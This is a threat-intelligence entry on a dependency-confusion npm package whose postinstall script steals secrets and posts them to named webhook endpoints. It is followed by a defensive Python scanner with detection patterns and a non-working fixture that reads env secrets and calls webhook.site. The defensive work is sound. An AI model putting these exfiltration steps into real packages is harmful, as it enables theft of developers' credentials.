Supply-chain threat intelligence
Risk score: 92
Indexed incident for cryptodao-contracts (npm).
The package is published as version 99.99.99 so that it outranks any internal release and wins private-vs-public resolution against an internal cryptodao-contracts namespace (dependency confusion). The package's main module is a one-line stub; the real payload runs from the postinstall script recon.js. On npm install, recon.js enumerates a hardcoded list of installer-side secret environment variables (AWS_SECRET_ACCESS_KEY, SSH_PRIVATE_KEY, NPM_TOKEN, GITLAB_ACCESS_TOKEN, MNEMONIC, SEED_PHRASE, PRIVATE_KEY, DB_PASSWORD, etc.), reads .env files from installer-owned paths (/root/.env, /app/.env, .env.production), and grep-extracts lines matching KEY|SECRET|TOKEN|PASS|PRIVATE|MNEMONIC. The collected secrets, hostname, user, cwd, and CI build-directory listings are POSTed over HTTPS to two attacker-controlled endpoints, webhook.site/d6d18927-e513-4df7-b019-58bfc64fe0dd and enqoojbegdvxj.x.pipedream.net, with TLS verification disabled (rejectUnauthorized: false). The source describes itself as a 'CryptoDAO Dependency Confusion Reconnaissance Payload'.
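The indicators above (placeholder version, lifecycle hook doing the real work, stub main module, secret-bearing env names, .env reads, disabled TLS verification, known exfiltration hosts) can be turned into a static pre-install triage check. The following is an added example, not code from the indexed package or from this intelligence feed; the fixture it writes to a temp directory is constructed to mirror the record's indicators and is deliberately not a working script, and the threshold of 99 for a "placeholder" major version is an assumption.

```python
import json
import os
import re
import tempfile

# Environment-variable names the incident record lists as harvested by recon.js.
HARVESTED_ENV_NAMES = [
    "AWS_SECRET_ACCESS_KEY", "SSH_PRIVATE_KEY", "NPM_TOKEN", "GITLAB_ACCESS_TOKEN",
    "MNEMONIC", "SEED_PHRASE", "PRIVATE_KEY", "DB_PASSWORD",
]
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
# Exfiltration hosts named in the record (matched by domain, not by the full path).
EXFIL_HOST_RE = re.compile(r"webhook\.site|pipedream\.net", re.IGNORECASE)
ENV_FILE_RE = re.compile(r"[\"'][^\"']*\.env(?:\.[a-z]+)?[\"']")
TLS_OFF_RE = re.compile(r"rejectUnauthorized\s*:\s*false")
ENV_ACCESS_RE = re.compile(r"process\.env")


def placeholder_version(version):
    """True for versions chosen to outrank any plausible internal release (assumed: major >= 99)."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", version or "")
    return bool(m) and int(m.group(1)) >= 99


def scan_script_text(text):
    """Return indicator findings for one JavaScript source file."""
    findings = []
    names = [n for n in HARVESTED_ENV_NAMES if n in text]
    if ENV_ACCESS_RE.search(text) and names:
        findings.append("reads secret-bearing env vars: " + ", ".join(names))
    if ENV_FILE_RE.search(text):
        findings.append("reads .env files from disk")
    if TLS_OFF_RE.search(text):
        findings.append("disables TLS verification (rejectUnauthorized: false)")
    if EXFIL_HOST_RE.search(text):
        findings.append("contacts a known exfiltration host")
    return findings


def triage_package(pkg_dir):
    """Return human-readable findings for an unpacked npm package directory."""
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as f:
        manifest = json.load(f)
    findings = []
    if placeholder_version(manifest.get("version")):
        findings.append(f"version {manifest['version']} looks like a dependency-confusion placeholder")
    scripts = manifest.get("scripts", {})
    hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
    for hook, cmd in hooks.items():
        findings.append(f"lifecycle hook {hook}: {cmd}")
    # A one-line main module next to an install hook means the hook is where the behaviour lives.
    main_path = os.path.join(pkg_dir, manifest.get("main", "index.js"))
    if hooks and os.path.isfile(main_path):
        with open(main_path, encoding="utf-8") as f:
            non_empty = [line for line in f if line.strip()]
        if len(non_empty) <= 1:
            findings.append("main module is a stub; behaviour lives in lifecycle hooks")
    for root, _, files in os.walk(pkg_dir):
        for name in sorted(files):
            if name.endswith((".js", ".cjs", ".mjs")):
                with open(os.path.join(root, name), encoding="utf-8") as f:
                    for finding in scan_script_text(f.read()):
                        findings.append(f"{name}: {finding}")
    return findings


def make_sample_package():
    """Write a constructed fixture mirroring the record's indicators (not the real package)."""
    d = tempfile.mkdtemp(prefix="npm-triage-")
    with open(os.path.join(d, "package.json"), "w", encoding="utf-8") as f:
        json.dump({"name": "cryptodao-contracts", "version": "99.99.99",
                   "main": "index.js", "scripts": {"postinstall": "node recon.js"}}, f)
    with open(os.path.join(d, "index.js"), "w", encoding="utf-8") as f:
        f.write("module.exports = {};\n")
    with open(os.path.join(d, "recon.js"), "w", encoding="utf-8") as f:
        f.write(
            '// constructed indicator fragment for the scanner; not a working script\n'
            'const https = require("https");\n'
            'const fs = require("fs");\n'
            'const names = ["AWS_SECRET_ACCESS_KEY", "NPM_TOKEN", "MNEMONIC"];\n'
            'const vals = names.map((n) => process.env[n]);\n'
            'const dotenv = fs.readFileSync("/root/.env", "utf8");\n'
            'https.request({ hostname: "webhook.site", method: "POST", rejectUnauthorized: false });\n'
        )
    return d


if __name__ == "__main__":
    for line in triage_package(make_sample_package()):
        print("-", line)
```

Run it against an unpacked tarball (`npm pack <name>` then extract) before the package is allowed into a build; any lifecycle-hook finding combined with an exfiltration-host or TLS-off finding is grounds to block. The check complements, rather than replaces, the structural mitigations for dependency confusion: pin internal scopes to the internal registry in `.npmrc` and install with `ignore-scripts=true` so that a postinstall hook never runs on CI unless explicitly allowed.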
Affected versions
Indicators
Timeline